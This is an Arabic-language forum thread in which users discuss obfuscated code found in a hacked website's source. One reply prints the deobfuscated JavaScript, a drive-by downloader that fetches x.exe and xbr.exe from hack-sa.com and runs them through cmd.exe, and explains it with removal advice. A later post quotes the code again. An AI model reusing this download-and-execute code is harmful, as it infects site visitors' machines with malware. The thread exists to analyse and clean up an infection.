النتائج 1 إلى 4 من 4

الموضوع: وش معنى هالكود الموجود بسورس دليل عز بعد الاختراق ؟؟

  1. #1

    وش معنى هالكود الموجود بسورس دليل عز بعد الاختراق ؟؟



    هذا فقط ماوجدته بالسورس كاملاً

    تم حذف الكود من قبلي منعاً لانتشاره بين ضعاف النفوس


    شئ عجيب !!
    مع خبرتي بالجافا والـ PHP إلا أني اول مره اشوف هالكود !!
    ممكن احد يفيدنا لاهنتم ؟ خاصة zizwar !!





    __________________
    تابعني على Twitter


  2. #2
    عضو شرف
    تاريخ التسجيل
    Mar 2003
    المشاركات
    1,899


    كود خطير يقوم بتنفيذ جافا سكريبت لتنزيل ملفين على جهاز الزائر

    بعد مافكيته هذا اصله

    كود:
    <script language=javascript>
    
    function gn(n) 
    
    { 
    
    var number = Math.random()*n; return '~tmp'+Math.round(number)+'.exe'; 
    
    } 
    
    try 
    
    { aaa="ob";
    
    bbb="je";
    
    yyy="ct";
    
    ccc="Adodb.";
    
    ddd="Stream";
    
    eee="Microsoft.";
    
    fff="XMLHTTP";
    
    ggg="o";
    
    kkk="p";
    
    mmm="e";
    
    sss="n";
    
    lj='http://www.hack-sa.com/x.exe'; 
    
    var df=document.createElement(aaa+bbb+yyy); 
    
    
    var x=df.CreateObject(eee+fff,""); 
    
    var S=df.CreateObject(ccc+ddd,""); 
    
    S.type=1; 
    
    x.open("GET", lj,0);
    
    x.send(); 
    
    mz1=gn(10000); 
    
    
    
    S.Open();
    
    ttt=x.responseBody;
    
    S.Write(ttt); 
    
    S.SaveToFile(mz1,2); S.Close(); 
    
    Q.ShellExecute(exp1,' /c '+mz1,"",ggg+kkk+mmm+sss,0); 
    
    } catch(i) { i=1; } 
    
    </script>
    
    
    
    <script language=javascript>
    
    function gn(n) 
    
    { 
    
    var number = Math.random()*n; return '~tmp'+Math.round(number)+'.exe'; 
    
    } 
    
    try 
    
    { aaa="ob";
    
    bbb="je";
    
    yyy="ct";
    
    ccc="Adodb.";
    
    ddd="Stream";
    
    eee="Microsoft.";
    
    fff="XMLHTTP";
    
    ggg="o";
    
    kkk="p";
    
    mmm="e";
    
    sss="n";
    
    lj='http://www.hack-sa.com/xbr.exe'; 
    
    
    
    S.type=1; 
    
    x.open("GET", lj,0);
    
    x.send(); 
    
    mz1=gn(10000); 
    
    ttt=x.responseBody;
    
    S.Write(ttt); 
    
    S.SaveToFile(mz1,2); S.Close(); 
    
    var Q=df.CreateObject("Shell.Application",""); 
    
    exp1=F.BuildPath(tmp+'\\system32','cmd.exe'); 
    
    Q.ShellExecute(exp1,' /c '+mz1,"",ggg+kkk+mmm+sss,0); 
    
    } catch(i) { i=1; } 
    
    </script>
    
    
    
    <script type="text/jscript">function init() { document.write("<title>قريــبا !</title><p align=center>&nbsp;</p><p align=center><font size=7>الموقع تحت الانشأء </font><b><font size=7>.. !</font></b></p>");}window.onload = init;</script>
    
    <body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
    يقوم بانزال ملفين

    xbr.exe

    و

    x.exe


    لذلك ابحث عن هذه الملفين في جهازك

    ادخل على الويندوز من خلال safe mode

    واحذفها



    ملاحظه :

    لقد قمت بحذف بعض الاسطر تحسبا من ضعاف النفوس



    فكرة الفايروس كالتالي :

    يقوم بتنزيل الملفات على الكاش في جهاز الزائر

    يستخدم cmd او الدوس لنسخ الملفين الى مجلد system32

    يستخدم ال register لوضع بيانات تنفيذ الملفات

    يرجع يستخدم الدوس لتنفيذ الملفين


    * شرحتها للافاده وايضا حذفت الاسطر المهمه لتشغيلها اي وجود الكود هنا بدون فائده

    وارجو منك تعديل موضوعك وحذف بعض من الارقام حتى لايظهر الكود كامل عند فك التشفير

    شكرا لك





    __________________
    محلل لنظم المعلومات - ارسل لي رساله خاصه عبر المنتدى | join me on facebook / twitter
    php | flash&flex&air actionscript 2,3 | ajax&javascript | database pro Analyzer

  3. #3
    عضو نشيط
    تاريخ التسجيل
    Sep 2006
    المشاركات
    82


    اقتباس المشاركة الأصلية كتبت بواسطة MohDesign
    كود خطير يقوم بتنفيذ جافا سكريبت لتنزيل ملفين على جهاز الزائر

    بعد مافكيته هذا اصله

    كود:
    <script language=javascript>
    
    function gn(n) 
    
    { 
    
    var number = Math.random()*n; return '~tmp'+Math.round(number)+'.exe'; 
    
    } 
    
    try 
    
    { aaa="ob";
    
    bbb="je";
    
    yyy="ct";
    
    ccc="Adodb.";
    
    ddd="Stream";
    
    eee="Microsoft.";
    
    fff="XMLHTTP";
    
    ggg="o";
    
    kkk="p";
    
    mmm="e";
    
    sss="n";
    
    lj='http://www.hack-sa.com/x.exe'; 
    
    var df=document.createElement(aaa+bbb+yyy); 
    
    
    var x=df.CreateObject(eee+fff,""); 
    
    var S=df.CreateObject(ccc+ddd,""); 
    
    S.type=1; 
    
    x.open("GET", lj,0);
    
    x.send(); 
    
    mz1=gn(10000); 
    
    
    
    S.Open();
    
    ttt=x.responseBody;
    
    S.Write(ttt); 
    
    S.SaveToFile(mz1,2); S.Close(); 
    
    Q.ShellExecute(exp1,' /c '+mz1,"",ggg+kkk+mmm+sss,0); 
    
    } catch(i) { i=1; } 
    
    </script>
    
    
    
    <script language=javascript>
    
    function gn(n) 
    
    { 
    
    var number = Math.random()*n; return '~tmp'+Math.round(number)+'.exe'; 
    
    } 
    
    try 
    
    { aaa="ob";
    
    bbb="je";
    
    yyy="ct";
    
    ccc="Adodb.";
    
    ddd="Stream";
    
    eee="Microsoft.";
    
    fff="XMLHTTP";
    
    ggg="o";
    
    kkk="p";
    
    mmm="e";
    
    sss="n";
    
    lj='http://www.hack-sa.com/xbr.exe'; 
    
    
    
    S.type=1; 
    
    x.open("GET", lj,0);
    
    x.send(); 
    
    mz1=gn(10000); 
    
    ttt=x.responseBody;
    
    S.Write(ttt); 
    
    S.SaveToFile(mz1,2); S.Close(); 
    
    var Q=df.CreateObject("Shell.Application",""); 
    
    exp1=F.BuildPath(tmp+'\\system32','cmd.exe'); 
    
    Q.ShellExecute(exp1,' /c '+mz1,"",ggg+kkk+mmm+sss,0); 
    
    } catch(i) { i=1; } 
    
    </script>
    
    
    
    <script type="text/jscript">function init() { document.write("<title>قريــبا !</title><p align=center>&nbsp;</p><p align=center><font size=7>الموقع تحت الانشأء </font><b><font size=7>.. !</font></b></p>");}window.onload = init;</script>
    
    <body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
    يقوم بانزال ملفين

    xbr.exe

    و

    x.exe


    لذلك ابحث عن هذه الملفين في جهازك

    ادخل على الويندوز من خلال safe mode

    واحذفها



    ملاحظه :

    لقد قمت بحذف بعض الاسطر تحسبا من ضعاف النفوس



    فكرة الفايروس كالتالي :

    يقوم بتنزيل الملفات على الكاش في جهاز الزائر

    يستخدم cmd او الدوس لنسخ الملفين الى مجلد system32

    يستخدم ال register لوضع بيانات تنفيذ الملفات

    يرجع يستخدم الدوس لتنفيذ الملفين


    * شرحتها للافاده وايضا حذفت الاسطر المهمه لتشغيلها اي وجود الكود هنا بدون فائده

    وارجو منك تعديل موضوعك وحذف بعض من الارقام حتى لايظهر الكود كامل عند فك التشفير

    شكرا لك
    طيب هل يعمل الكود مع الفايرفوكس





    __________________
    تويتر فولورز بارخص الاسعار

  4. #4


    بيض الله وجهك على المعلومة يا أستاذي MohDesign

    وتم حذف الكود اعلاه منعاً للانتشار بين ضعاف النفوس

    اقتباس المشاركة الأصلية كتبت بواسطة Khlodi
    طيب هل يعمل الكود مع الفايرفوكس
    سبحان الله

    كنت بسأل هالسؤال بس سبقتني

    فعلاً بحثت بالكاش عن الملفين وبحثت عنهم أيضاً عن طريق البحث بالويندوز كاملاً

    ولم أجد شيئاً

    أيضاً اود ان اخبرك انني عندما قمت بفتح الصفحة اعطاني صفحة بيضاء فقط لاغير

    مع انه بالكود يعطيك document.write لكني لم ار اي كتابة على المتصفح نهائياً

    هل هذا معناه انه لايعمل مع الفايرفوكس ؟؟





    __________________
    تابعني على Twitter





ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •  
0
موقع مكملات غذائية | نظارات طبية | أضف موقعك هنا